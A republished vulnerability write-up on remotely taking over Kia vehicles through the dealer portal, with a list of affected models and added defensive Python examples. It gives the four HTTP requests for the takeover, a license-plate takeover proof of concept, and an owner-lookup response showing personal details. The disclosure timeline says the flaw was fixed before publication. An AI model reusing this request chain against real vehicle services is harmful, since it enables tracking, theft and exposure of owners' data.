2018 SORENTO Limited ✅️
2018 SORENTO EX Turbo
2018 SORENTO EX Turbo (Touring Pkg)
2018 SORENTO LX
2018 SORENTO LX (Convenience)
2018 SORENTO SX ✅️
2018 SOUL Exclaim AT (std + IP2) ✅️
2018 SOUL Plus AT
2018 SOUL Base AT
2018 SOUL Exclaim AT (SNS + TWS) ✅️
2018 SOUL Plus AT (UVO + AU + Primo) ✅️
2018 SOUL Plus AT
2018 SOUL Plus AT (UVO + AU) ✅️
2018 SOUL EV Soul EV ✅️ ✅️ ✅️ ✅️
2018 SOUL EV Soul EV+ ✅️ ✅️ ✅️ ✅️
2018 SPORTAGE EX (Premium Pkg)
2018 SPORTAGE EX
2018 SPORTAGE EX (Premium Pkg + Technology Pkg) ✅️
2018 SPORTAGE LX (Popular Pkg)
2018 SPORTAGE SX (Premium Pkg) ✅️
2018 STINGER GT1 ✅️
2018 STINGER GT ✅️
2018 STINGER GT2 ✅️
2018 STINGER LX
2018 STINGER Premium ✅️
2017 CADENZA Premium (Luxury + Technology) ✅️
2017 CADENZA Cadenza (Ltd) ✅️
2017 CADENZA Cadenza (Premium) ✅️
2017 FORTE S
2017 FORTE EX
2017 FORTE SX
2017 FORTE SX (Premium Technology Pkg) ✅️
2017 FORTE EX (Premium Technology Pkg) ✅️
2017 FORTE LX (Popular Pkg)
2017 FORTE S (Premium Pkg + Technology Pkg) ✅️
2017 FORTE S (Technology Pkg)
2017 FORTE KOUP EX ✅️
2017 FORTE KOUP SX ✅️
2017 FORTE KOUP SX (Manual Transmission) ✅️
2017 K900 Luxury V8 ✅️ ✅️ ✅️ ✅️
2017 K900 Luxury V8 (VIP Plus) ✅️ ✅️ ✅️ ✅️
2017 K900 Luxury ✅️ ✅️ ✅️ ✅️
2017 K900 Luxury (VIP) ✅️ ✅️ ✅️ ✅️
2017 K900 Premium ✅️ ✅️ ✅️ ✅️
2017 NIRO EX
2017 NIRO FE
2017 NIRO LX
2017 NIRO Touring ✅️
2017 OPTIMA EX
2017 OPTIMA LX Turbo (Technology Pkg) ✅️
2017 OPTIMA EX (Premium Pkg + Technology Pkg) ✅️
2017 OPTIMA EX (Premium Pkg) ✅️
2017 OPTIMA LX Turbo (Value)
2017 OPTIMA Limited Turbo ✅️
2017 OPTIMA SX Turbo ✅️
2017 OPTIMA SX Turbo (Premium Pkg + Technology Pkg) ✅️
2017 OPTIMA SX Turbo (Premium Pkg) ✅️
2017 OPTIMA HYBRID LX (Convenience)
2017 OPTIMA HYBRID EX ✅️
2017 OPTIMA HYBRID EX (Technology Pkg) ✅️
2017 OPTIMA HYBRID LX
2017 RIO EX (4D/Eco) ✅️
2017 RIO EX (5D/Eco) ✅️
2017 RIO SX (5D) ✅️
2017 OPTIMA PHEV EX ✅️ ✅️ ✅️ ✅️
2017 SEDONA EX
2017 SEDONA EX (Adv Technology Pkg)
2017 SEDONA LX (Essentials + Adv Technology Pkg)
2017 SEDONA LX (Essentials Premium Pkg)
2017 SEDONA LX (UVO Pkg)
2017 SEDONA Limited ✅️
2017 SEDONA SX ✅️
2017 SEDONA SX (Adv Touring Pkg) ✅️
2017 SORENTO EX
2017 SORENTO LX (Convenience + Essentials Premium Pkg)
2017 SORENTO EX (Touring Pkg)
2017 SORENTO Limited ✅️
2017 SORENTO LX (Convenience + Adv Technology Pkg)
2017 SORENTO LX (Convenience)
2017 SORENTO SX ✅️
2017 SOUL Exclaim
2017 SOUL Exclaim (Technology Pkg) ✅️
2017 SOUL Plus AT
2017 SOUL Plus AT (UVO + AU + Primo + S10) ✅️
2017 SOUL Plus AT (UVO + AU + Primo) ✅️
2017 SOUL Plus AT (UVO + AU) ✅️
2017 SOUL EV Soul EV ✅️ ✅️ ✅️ ✅️
2017 SOUL EV Soul EV+ ✅️ ✅️ ✅️ ✅️
2017 SPORTAGE LX (Popular Pkg + Cool Connected Pkg)
2017 SPORTAGE EX
2017 SPORTAGE EX (Premium Pkg + Technology Pkg) ✅️
2017 SPORTAGE EX (Premium Pkg)
2017 SPORTAGE SX (Premium Pkg) ✅️
2016 CADENZA Premium (Luxury + Technology) ✅️
2016 CADENZA Cadenza (Std) ✅️
2016 CADENZA Limited ✅️
2016 CADENZA Premium (Luxury) ✅️
2016 FORTE EX (Premium Technology Pkg) ✅️
2016 FORTE EX (Premium Pkg) ✅️
2016 FORTE EX (Premium Plus Pkg) ✅️
2016 FORTE SX (Premium Technology Pkg) ✅️
2016 FORTE KOUP EX (Premium Technology Pkg) ✅️
2016 FORTE KOUP SX (Premium Technology Pkg) ✅️
2016 K900 Luxury ✅️ ✅️ ✅️ ✅️
2016 K900 Luxury (VIP) ✅️ ✅️ ✅️ ✅️
2016 K900 Luxury V8 ✅️ ✅️ ✅️ ✅️
2016 K900 Luxury V8 (VIP Plus) ✅️ ✅️ ✅️ ✅️
2016 K900 Premium ✅️ ✅️ ✅️ ✅️
2016 K900 Premium(IHP) ✅️ ✅️ ✅️ ✅️
2016 K900 Luxury V8 (WV2,CPL) ✅️ ✅️ ✅️ ✅️
2016 K900 Premium(Std) ✅️ ✅️ ✅️ ✅️
2016 OPTIMA EX (Premium Pkg) ✅️
2016 OPTIMA EX (Premium Pkg + Technology Pkg) ✅️
2016 OPTIMA LX Turbo (Technology Pkg) ✅️
2016 OPTIMA Limited Turbo ✅️
2016 OPTIMA SX Turbo ✅️
2016 OPTIMA SX Turbo (Premium Pkg + Technology Pkg) ✅️
2016 OPTIMA SX Turbo (Premium Pkg) ✅️
2016 OPTIMA HYBRID LX (Convenience) ✅️
2016 OPTIMA HYBRID EX ✅️
2016 OPTIMA HYBRID EX (Technology Pkg) ✅️
2016 RIO EX (4D/Eco) ✅️
2016 RIO EX (5D/Eco) ✅️
2016 RIO SX (4D) ✅️
2016 RIO SX (5D) ✅️
2016 SEDONA EX ✅️
2016 SEDONA EX (Premium Pkg) ✅️
2016 SEDONA LX (Convenience) ✅️
2016 SEDONA Limited ✅️
2016 SEDONA SX ✅️
2016 SEDONA SX (Premium Pkg) ✅️
2016 SORENTO EX ✅️
2016 SORENTO EX (Premium Pkg) ✅️
2016 SORENTO Limited ✅️
2016 SORENTO EX (Premium Pkg + Touring Pkg) ✅️
2016 SORENTO LX ✅️
2016 SORENTO LX (Convenience) ✅️
2016 SORENTO SX ✅️
2016 SOUL Plus (Audio Pkg) ✅️
2016 SOUL Exclaim ✅️
2016 SOUL Exclaim (Premium Pkg) ✅️
2016 SOUL Plus (Primo Pkg) ✅️
2016 SOUL Plus (Signature 2.0 Sp. Ed.) ✅️
2016 SOUL Plus (Special Edition) ✅️
2016 SOUL EV Soul EV ✅️ ✅️ ✅️
2016 SOUL EV Soul EV+ ✅️ ✅️ ✅️
2016 SPORTAGE EX (Premium Pkg) ✅️
2016 SPORTAGE SX (Premium Pkg) ✅️
2015 CADENZA Limited ✅️
2015 CADENZA Premium (Luxury + Technology) ✅️
2015 CADENZA Premium (Luxury) ✅️
2015 CADENZA Premium (Std) ✅️
2015 FORTE EX (Premium Pkg + Technology Pkg + UVO Pkg) ✅️
2015 FORTE EX (Premium Pkg + UVO Pkg) ✅️
2015 FORTE EX (UVO Pkg) ✅️
2015 FORTE SX ✅️
2015 FORTE SX (Premium Pkg) ✅️
2015 FORTE LX (Popular Pkg + UVO Pkg) ✅️
2015 FORTE SX (Premium Pkg + Technology Pkg) ✅️
2015 FORTE KOUP SX ✅️
2015 FORTE KOUP EX (Premium Pkg + Technology Pkg) ✅️
2015 FORTE KOUP SX (Premium Pkg + Technology Pkg) ✅️
2015 FORTE KOUP SX (Premium Pkg) ✅️
2015 OPTIMA EX (Premium Pkg) ✅️
2015 OPTIMA EX (Premium Pkg + Technology Pkg) ✅️
2015 OPTIMA LX (Convenience Plus Pkg) ✅️
2015 OPTIMA Limited Turbo ✅️
2015 OPTIMA SX (Premium) ✅️
2015 OPTIMA SX Turbo (Premium Pkg + Technology Pkg) ✅️
2015 OPTIMA SX Turbo (Premium Pkg) ✅️
2015 OPTIMA HYBRID EX ✅️
2015 OPTIMA HYBRID EX (Technology Pkg) ✅️
2015 OPTIMA HYBRID LX (Convenience) ✅️
2015 OPTIMA HYBRID SX ✅️
2015 SEDONA SX ✅️
2015 SEDONA EX (Premium Plus Pkg) ✅️
2015 SEDONA EX (UVO Pkg) ✅️
2015 SEDONA LX ✅️
2015 SEDONA LX (Convenience) ✅️
2015 SEDONA Limited ✅️
2015 SEDONA SX (Premium Pkg) ✅️
2015 SORENTO EX ✅️
2015 SORENTO EX (Touring Pkg) ✅️
2015 SORENTO LX (Convenience) ✅️
2015 SORENTO Limited ✅️
2015 SORENTO SX ✅️
2015 SOUL Exclaim ✅️
2015 SOUL Exclaim (Sun & Sound Pkg) ✅️
2015 SOUL Automatic Transmission ✅️
2015 SOUL Exclaim (Sun & Sound Pkg + The Whole Shabang Pkg) ✅️
2015 SOUL Plus (Audio + UVO) ✅️
2015 SOUL Plus (UVO Pkg) ✅️
2015 SOUL EV Soul EV ✅️ ✅️ ✅️
2015 SOUL EV Soul EV+ ✅️ ✅️ ✅️
2015 SPORTAGE EX ✅️
2015 SPORTAGE EX (Premium Pkg) ✅️
2015 SPORTAGE LX (Popular Pkg) ✅️
2015 SPORTAGE LX (UVO Pkg) ✅️
2015 SPORTAGE SX (Premium Pkg) ✅️
2014 CADENZA Premium (Luxury) ✅️
2014 CADENZA Premium (Luxury + Technology) ✅️
2014 CADENZA Limited ✅️
2014 CADENZA Premium (Std) ✅️
2014 FORTE SX ✅️
2014 FORTE EX ✅️
2014 FORTE EX (Premium Pkg + Technology Pkg) ✅️
2014 FORTE SX (Premium Pkg + Technology Pkg) ✅️
2014 FORTE EX (Premium Pkg) ✅️
2014 FORTE SX (Premium Pkg) ✅️
2014 FORTE KOUP EX (Premium Pkg + Technology Pkg) ✅️
2014 FORTE KOUP SX (Premium Pkg) ✅️
2014 FORTE KOUP EX ✅️
2014 FORTE KOUP EX (Premium Pkg) ✅️
2014 FORTE KOUP SX ✅️
2014 FORTE KOUP SX (Premium Pkg + Technology Pkg) ✅️
2014 OPTIMA HYBRID EX (Premium Pkg + Technology Pkg) ✅️
2014 OPTIMA HYBRID LX (Convenience) ✅️
2014 SORENTO EX ✅️
2014 SORENTO EX (Touring Pkg) ✅️
2014 SORENTO LX (Convenience + Premium Pkg + Touring Pkg) ✅️
2014 SORENTO LX (Convenience + Premium Pkg) ✅️
2014 SORENTO LX (Convenience) ✅️
2014 SORENTO Limited ✅️
2014 SORENTO SX ✅️
2014 SOUL Exclaim ✅️
2014 SOUL Exclaim (Sun & Sound Pkg + The Whole Shabang Pkg) ✅️
2014 SOUL Plus (Audio + UVO Pkg) ✅️
2014 SOUL Plus (UVO Pkg) ✅️
2014 SPORTAGE EX (Premium Pkg) ✅️
2014 SPORTAGE LX (Popular Pkg) ✅️
2014 SPORTAGE EX ✅️
2014 SPORTAGE SX ✅️
2014 SPORTAGE SX (Premium Pkg) ✅️

Credit

Vulnerability Writeup

Around two years ago, a few hackers and I hunted for vulnerabilities on over a dozen different car companies. We discovered critical issues that would’ve allowed attackers to remotely locate, disable starters, unlock, and start an estimated 15.5 million vehicles. There was a big reaction to this. Paul Roberts, founder of The Security Ledger, even testified about these findings in a US congressional hearing.

Since so much time had passed, we decided to revisit a few of the larger companies to see if we couldn’t discover any new issues. The first one we spent time on was Kia.

When we began looking at Kia, we originally focused on the owners.kia.com website and the Kia Connect iOS app com.myuvo.link. Both of these applications were interesting because they could execute internet-to-vehicle commands.

While the owners website and the mobile app served the same purpose, they handled vehicle commands differently. The owners website used a backend reverse-proxy to forward user commands to the api.owners.kia.com backend service that was actually responsible for executing vehicle commands, whereas the mobile app instead accessed this API directly.

The following HTTP request shows how the owners.kia.com website will proxy an API request to the api.owners.kia.com host to unlock a car door.

HTTP Request to Unlock Car Door on the “owners.kia.com” website

POST /apps/services/owners/apigwServlet.html HTTP/2
Host: owners.kia.com
Httpmethod: GET
Apiurl: /door/unlock
Servicetype: postLoginCustomer
Cookie: JSESSIONID=SESSION_TOKEN;

After the above HTTP request is sent from the owners.kia.com website, the Kia backend uses our JSESSIONID as auth to generate a Sid session ID header, which is consumed by the backend API, then finally sends the forwarded HTTP request to the api.owners.kia.com host in the following format.

HTTP Request Formed and Proxied by Server

GET /apigw/v1/rems/door/unlock HTTP/1.1
Host: api.owners.kia.com
Sid: 454817d4-b228-4103-a26f-884e362e8dee
Vinkey: 3ecc1a19-aefd-4188-a7fe-1723e1663d6e

The important headers in the above HTTP request are the Sid (session token) and Vinkey (UUID that indexes to VIN). There are various other headers included that are all necessary to access the API itself, but those are the two related to vehicle access controls. Both of the above HTTP requests were in the same area where we had found the original Kia vulnerabilities in 2023.

Since we were already super familiar with the user side of things, we decided to look at the Kia Dealer website instead.

Targeting Kia Dealer Infrastructure

Something we’d never tested was how Kia actually performed vehicle activations for new purchases. After speaking to a few people, we learned that Kia would ask for your email address at the dealership and you’d receive a registration link to either register a new Kia account or add your newly purchased vehicle to your pre-existing Kia account.

We asked if they could share the registration links given to them by Kia, and nicely enough, they forwarded their emails. We copied the following URL from the hyperlink:

https://kiaconnect.kdealer.com/content/kDealer/en/kiauser.html?token=dealer_generated_access_token&vin=example_vin&scenarioType=3

Super interesting! The kiaconnect.kdealer.com domain was one we’d never seen before. We opened the URL and saw the following endpoint:

Figure: Kiaconnect Initial Vehicle Registration URL

In the above URL, the token parameter (otherwise known as a VIN Key) is an access token generated by a Kia dealer as a one-time grant to modify the vehicle specified in the vin parameter. After loading the above URL, the following HTTP request will be sent to validate that the token has not expired or been used.

POST /apps/services/kdealer/apigwServlet.html HTTP/1.1
Host: kiaconnect.kdealer.com

{
  "token": "985a49f0-1fe5-4d36-860e-d9b93272072b",
  "vin": "5XYP3DHC9NG310533",
  "scenarioType": 3,
  "loginPref": null
}
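
A one-time grant like the token described above has to be bound to the VIN it was issued for, expire, and be consumed atomically. The following Python is an added example, not code from the original post or from Kia; the class, its method names and the state strings are hypothetical, and only the UUID token shape and the VINs used in the test come from the requests on this page.

```python
import hashlib
import threading
import time
import uuid


class EnrollmentTokens:
    """One-time, VIN-bound, expiring grants (hypothetical names throughout)."""

    def __init__(self, ttl_seconds=3600, clock=time.time):
        self._ttl = ttl_seconds
        self._clock = clock              # injectable so expiry can be tested
        self._lock = threading.Lock()
        self._grants = {}                # sha256(token) -> grant record

    @staticmethod
    def _digest(token):
        # Only a hash is stored, so a leaked table does not yield usable tokens.
        return hashlib.sha256(str(token).encode()).hexdigest()

    def issue(self, vin):
        """Create a grant for exactly one VIN and return the token once."""
        token = str(uuid.uuid4())        # random UUID, same shape as the page's token
        with self._lock:
            self._grants[self._digest(token)] = {
                "vin": vin,
                "expires": self._clock() + self._ttl,
                "used": False,
            }
        return token

    def _state(self, token, vin):
        grant = self._grants.get(self._digest(token))
        # A token presented with the wrong VIN is reported exactly like an
        # unknown token, so the response does not confirm that it exists.
        if grant is None or grant["vin"] != vin:
            return "invalid", None
        if grant["used"]:
            return "used", grant
        if self._clock() >= grant["expires"]:
            return "expired", grant
        return "ok", grant

    def check(self, token, vin):
        """Non-consuming check, like the validation request sent on page load."""
        with self._lock:
            return self._state(token, vin)[0]

    def redeem(self, token, vin):
        """Check and consume in one critical section, so two racing
        requests cannot both succeed with the same token."""
        with self._lock:
            state, grant = self._state(token, vin)
            if state == "ok":
                grant["used"] = True
            return state
```
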

Very interesting. The HTTP request sent to validate the one-time access token was being sent to the same /apps/services/kdealer/apigwServlet.html URI as the previous owners.kia.com request, except this time, it was being sent on the Kia Connect dealer website. This likely meant that the dealer infrastructure had a similar forwarding proxy to an internal API for dealership functionality.

We dug through the JavaScript looking for interesting APIGW calls and found what appeared to be employee-only functionality. There were references to dealer vehicle lookup, account lookup, enroll, unenroll, and many more dealer related API calls.

dealerVehicleLookUp() {
    this.displayLoader = !0, this.vinToEnroll = "eDelivery" != this.entryPoint ? this.vinToEnroll.replace(/\s/g, "") : this.userDetails.vin, "17" == this.vinToEnroll.length && this.landingPageService.postOffice({
        vin: this.vinToEnroll
    }, "/dec/dlr/dvl", "POST", "postLoginCustomer").subscribe(i => {
        i && (i.hasOwnProperty("body") && "0" == i.body.status.statusCode ? this.processDvlData(i.body) : "1003" == i.body.status.errorCode && "kia-dealer" == this.entryPoint ? this.reRouteSessionExpire() : (this.displayLoader = !1, this.alertMessage = i.body.status.errorMessage, document.getElementById("triggerGeneralAlertModal").click()))
    })
}

To test if we could access any of these endpoints, we formed the HTTP request to the dealer APIGW endpoint with our own dealer token (Appid header) and the VIN of a vehicle that we owned.

Attempted HTTP Request to Search VIN using Kia Dealer APIGW Endpoint

POST /apps/services/kdealer/apigwServlet.html HTTP/1.1
Host: kiaconnect.kdealer.com
Httpmethod: POST
Apiurl: /dec/dlr/dvl

{
    "vin": "1HGBH41JXMN109186"
}

HTTP Response

HTTP/1.1 401 Unauthorized
Content-type: application/json

{
  "status": {
    "statusCode": 1,
    "errorType": 1,
    "errorCode": 1003,
    "errorMessage": "Session Key is either invalid or expired"
  }
}

Nope. It did not seem like the dealer endpoints wanted to work with the access token that was given to us via email when purchasing a new car.

We thought back to the original owners.kia.com website and then wondered: what if there was a way to just register as a dealer, generate an access token, then use that access token here? The kiaconnect.kdealer.com website seemed to have the same API format, so maybe we could just copy the format, register an account, and log in?

POST /apps/services/kdealer/apigwServlet.html HTTP/1.1
Host: kiaconnect.kdealer.com
Httpmethod: POST
Apiurl: /prof/registerUser

{
  "userCredential": {
    "firstName": "Sam",
    "lastName": "Curry",
    "userId": "[email protected]",
    "password": "FakePass123!",
    "acceptedTerms": 1
  }
}

It returned 200 OK! It seemed that we could register on the Kia Dealer website using the same HTTP request used to register on the Kia Owners website. We quickly tried to log in and generate an access token:

POST /apps/services/kdealer/apigwServlet.html HTTP/1.1
Host: kiaconnect.kdealer.com
Httpmethod: POST
Apiurl: /prof/authUser

{
  "userCredential": {
    "userId": "[email protected]",
    "password": "FakePass123!"
  }
}

The login was valid: the server returned an HTTP response with a session cookie.

HTTP/1.1 200 OK
Sid: 123e4567-e89b-12d3-a456-426614174000

We sent our generated access token to the previously unauthorized dealer APIGW endpoint to search a VIN.

HTTP Request to Search VIN using Kia Dealer APIGW Endpoint (with “dda” access token)

POST /apps/services/kdealer/apigwServlet.html HTTP/1.1
Host: kiaconnect.kdealer.com
Appid: 123e4567-e89b-12d3-a456-426614174000
Apiurl: /dec/dlr/dvl

{
    "vin": "1HGBH41JXMN109186"
}

HTTP Response

HTTP/1.1 200 OK
Content-type: application/json

{
  "payload": {
    "billingSubscriptionSupported": 1,
    "digitalKeySupported": 0,
    "generation": "3",
    "profiles": [
      {
        "address": {},
        "billSubscriptionStatus": 1,
        "digitalKeyStatus": 0,
        "email": "[email protected]",
        "enrollmentReqStatus": 1,
        "enrollmentStatus": 1,
        "firstName": "yeet",
        "lastName": "yeet",
        "loginId": "[email protected]",
        "phone": "4027181388",
        "phoneType": 3,
        "wifiHotspotStatus": 0
      }
    ],
    "vinAddedToAccount": 1,
    "wifiHotspotSupported": 1
  }
}

After registering and authenticating to a dealer account, we were able to generate a valid access token that could be used to call the backend dealer APIs! The HTTP response contained the vehicle owner’s name, phone number, and email address. We were able to authenticate into the dealer portal using our normal app credentials and the modified channel header. This meant that we could likely hit all other dealer endpoints.
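The gap described above is that the dealer gateway forwarded dealer-only Apiurl routes for any valid session, including one created through self-service registration. The following is an added sketch, not Kia's code, contrasting that behaviour with a deny-by-default role check; the session store, role names, function names and the grouping of routes are assumptions, and only the Apiurl values come from the write-up.

```python
from dataclasses import dataclass

# Apiurl values quoted in the write-up; the split into "public" and
# "dealer-only" is an assumed policy for illustration.
PUBLIC_ROUTES = {"/prof/registerUser", "/prof/authUser"}
DEALER_ROUTES = {"/dec/dlr/dvl", "/dec/dlr/rvp", "/ownr/dicve"}


@dataclass(frozen=True)
class Session:
    user_id: str
    role: str  # "owner" or "dealer", read from the server-side account record


# Constructed session store: sid -> Session.
SESSIONS = {
    "sid-selfreg": Session("new@example.test", "owner"),      # self-registered
    "sid-dealer": Session("dealer7@example.test", "dealer"),  # provisioned
}


def forward_permissive(sid, apiurl):
    """Behaviour the write-up describes: any valid session reaches any route."""
    if apiurl in PUBLIC_ROUTES:
        return 200
    return 200 if sid in SESSIONS else 401


def forward_checked(sid, apiurl):
    """Deny by default and require the dealer role for dealer routes."""
    if apiurl in PUBLIC_ROUTES:
        return 200
    session = SESSIONS.get(sid)
    if session is None:
        return 401  # no valid session, as in the 1003 error response
    if apiurl in DEALER_ROUTES:
        # The role comes from the account record, never from a request header.
        return 200 if session.role == "dealer" else 403
    return 404  # unknown route: not forwarded to the internal API
```

The important property is that self-service registration can only ever produce the `owner` role, so a session obtained that way is refused with 403 before the request reaches the backend.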

Taking Over Vehicles

After sifting through the JavaScript for a few hours, we finally learned how the enrollment, unenrollment, and vehicle modification endpoints worked. The following four HTTP requests could be sent in order to gain access to a victim’s vehicle.

Figure: Full high level attack flow

(1) Generate the Dealer Token and retrieve the “token” header from the HTTP Response

POST /apps/services/kdealer/apigwServlet.html HTTP/1.1
Host: kiaconnect.kdealer.com
Httpmethod: POST
Apiurl: /prof/authUser

{
  "userCredential": {
    "userId": "[email protected]",
    "password": "Fakepass123!"
  }
}
  • Using the dealer account we created, we’ll auth through the /prof/authUser endpoint to obtain a session token.

(2) Fetch Victim’s Email Address and Phone Number

POST /apps/services/kdealer/apigwServlet.html HTTP/1.1
Host: kiaconnect.kdealer.com
Httpmethod: POST
Apiurl: /dec/dlr/dvl
Appid: 123e4567-e89b-12d3-a456-426614174000

{
  "vin": "VIN"
}
  • With the added session token header, we are able to access all dealer endpoints on the kiaconnect.kdealer.com website and can retrieve the victim’s name, phone number, and email.

(3) Modify Owner’s Previous Access using Leaked Email Address and VIN number

POST /apps/services/kdealer/apigwServlet.html HTTP/1.1
Host: kiaconnect.kdealer.com
Httpmethod: POST
Apiurl: /dec/dlr/rvp
Appid: 123e4567-e89b-12d3-a456-426614174000

{
  "vin": "VIN",
  "loginId": "[email protected]",
  "dealerCode": "eDelivery"
}
  • We send this request to demote the owner of the vehicle so that we can add ourselves as the primary account holders. We must send the victim’s email here, which we obtained in step two.

(4) Add Attacker to Victim Vehicle

POST /apps/services/kdealer/apigwServlet.html HTTP/1.1
Host: kiaconnect.kdealer.com
Httpmethod: POST
Apiurl: /ownr/dicve
Appid: 123e4567-e89b-12d3-a456-426614174000

{
  "vin": "5XYRK4LFXMG016215",
  "loginId": "[email protected]"
}
  • Finally, we’ll assign our attacker-controlled email as the primary owner of the vehicle. This will allow us to send arbitrary commands to the vehicle.

The above four HTTP requests could be used to send commands to pretty much any Kia vehicle made after 2013 (see “Vehicles Affected” table for specifics) using only the license plate.

From the victim’s side, there was no notification that their vehicle had been accessed nor their access permissions modified. An attacker could resolve someone’s license plate, enter their VIN through the API, then track them passively and send active commands like unlock, start, or honk.
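Because the owner received no notification, the change of primary account holder was only visible in gateway traffic. The following added example, not part of the original post, correlates constructed gateway records to find a demotion (/dec/dlr/rvp) followed by enrollment of a different loginId (/ownr/dicve) on the same VIN, and returns who should be notified; the record layout, the time window and the two severity signals are assumptions.

```python
WINDOW = 600  # seconds; assumed correlation window

# Constructed gateway records: (ts, sid, apiurl, vin, login_id).
# For /prof/* rows, login_id is the userId from the request body.
LOG = [
    (100, None, "/prof/registerUser", None, "new@example.test"),
    (105, "sid-A", "/prof/authUser", None, "new@example.test"),
    (110, "sid-A", "/dec/dlr/dvl", "VIN-0001", None),
    (114, "sid-A", "/dec/dlr/rvp", "VIN-0001", "owner@example.test"),
    (119, "sid-A", "/ownr/dicve", "VIN-0001", "new@example.test"),
    (500, "sid-B", "/prof/authUser", None, "dealer7@example.test"),
    (510, "sid-B", "/dec/dlr/rvp", "VIN-0002", "seller@example.test"),
    (530, "sid-B", "/ownr/dicve", "VIN-0002", "buyer@example.test"),
]


def ownership_changes(records, window=WINDOW):
    """Return one event per VIN whose primary loginId was swapped by a session."""
    self_registered = set()  # userIds created through the self-service route
    session_user = {}        # sid -> userId that authenticated
    demoted = {}             # (sid, vin) -> (ts, demoted loginId)
    events = []
    for ts, sid, apiurl, vin, login_id in sorted(records, key=lambda r: r[0]):
        if apiurl == "/prof/registerUser":
            self_registered.add(login_id)
        elif apiurl == "/prof/authUser":
            session_user[sid] = login_id
        elif apiurl == "/dec/dlr/rvp":
            demoted[(sid, vin)] = (ts, login_id)
        elif apiurl == "/ownr/dicve" and (sid, vin) in demoted:
            d_ts, previous = demoted.pop((sid, vin))
            if ts - d_ts > window or login_id == previous:
                continue  # too far apart, or the same owner re-enrolled
            actor = session_user.get(sid)
            reasons = []
            if actor in self_registered:
                reasons.append("actor self-registered on dealer host")
            if actor == login_id:
                reasons.append("actor enrolled own account")
            events.append({
                "vin": vin, "notify": previous, "new_primary": login_id,
                "actor": actor, "reasons": reasons,
                "severity": "high" if reasons else "review",
            })
    return events
```

Every returned event names the demoted loginId in `notify`, so an out-of-band message to the previous owner can be sent even for changes that turn out to be a legitimate resale.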

The impact here was really obvious to us and we reported it to Kia immediately, but while they were working on a fix we decided to build a proof of concept dashboard that better demonstrated the impact of this vulnerability.

Creating License Plate Takeover Proof of Concept

The goal of our proof of concept UI was to simply have a dashboard where an attacker could (1) type in the license plate of a Kia vehicle, (2) retrieve the owner’s PII, then (3) execute commands on the vehicle.

Because we were adding the victim’s vehicle to our attacker-controlled account, we decided to build the proof of concept with an “exploit” page and a “garage” page. The exploit page would be used to actually take over the vehicles, then the garage page would be used to issue commands and locate the vehicles.

It worked via the following:

  • The License Plate to VIN form uses a third-party API to convert a license plate number to a VIN
  • The Takeover button would do the 4-step process to take over a victim’s vehicle using the VIN retrieved from the license plate number, by (1) generating a dealer token via the login form, (2) retrieving the email/phone number from the victim’s account, (3) demoting the account owner to an account holder, (4) adding ourselves as the primary account holder.
  • The Fetch Owner button would passively tell us the name, email, and phone number of the victim
  • The Garage tab would allow us to list and execute commands on compromised vehicles

After building this tool, we recorded a proof of concept using a locked rental Kia. The video included at the start of the blog shows us taking over a vehicle using our phone, then being able to remotely lock/unlock, start/stop, honk, and locate the vehicle.

Figure: Hacking a car using just the license plate

Figure: Executing commands on the compromised vehicle

Conclusion

Cars will continue to have vulnerabilities, because in the same way that Meta could introduce a code change which would allow someone to take over your Facebook account, car manufacturers could do the same for your vehicle.

Thanks for reading!

(shouts: teknogeek, dnz, ziot, xEHLE, umasi, shubs, computeruser, ic3qu33n)

Timeline

  • 06/07/24 04:40 PM UTC – Inquiry sent to Kia team on correct place to report vulnerabilities
  • 06/10/24 01:21 PM UTC – Response by Kia Team
  • 06/11/24 10:41 PM UTC – Report sent to Kia
  • 06/12/24 06:20 PM UTC – Email to bump ticket due to criticality
  • 06/14/24 06:00 PM UTC – Response from Kia team that they were investigating
  • 06/18/24 04:41 PM UTC – Email to bump ticket due to criticality, added screenshots of tool
  • 06/20/24 02:54 AM UTC – Email to bump ticket, included screenshot of license plate to access tool
  • 08/12/24 12:30 PM UTC – Email to bump ticket, asking for update
  • 08/14/24 05:41 PM UTC – Response from Kia team indicating they had remediated the vulnerability and were performing testing
  • 09/26/24 08:15 AM UTC – Disclosed vulnerability publicly after validating it had been remediated

Originally published by samcurry: Hacking Kia: Remotely Controlling Cars With Just a License Plate

Copyright notice: posted by admin on September 27, 2024 at 8:45 PM.